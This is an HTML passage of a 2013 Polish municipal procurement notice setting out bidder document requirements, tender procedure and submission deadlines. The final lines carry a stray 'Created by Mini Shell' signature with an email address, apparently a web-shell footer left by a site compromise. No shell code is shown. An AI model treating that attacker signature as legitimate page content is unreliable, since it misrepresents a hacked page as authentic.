<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mikolajkipomorskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 
ul.Dzierzgońska 2
82-433 Mikołajki Pomorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 10:00, miejsce: Urząd Gminy 
ul.Dzierzgońska 2
82-433 Mikołajki Pomorskie
pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com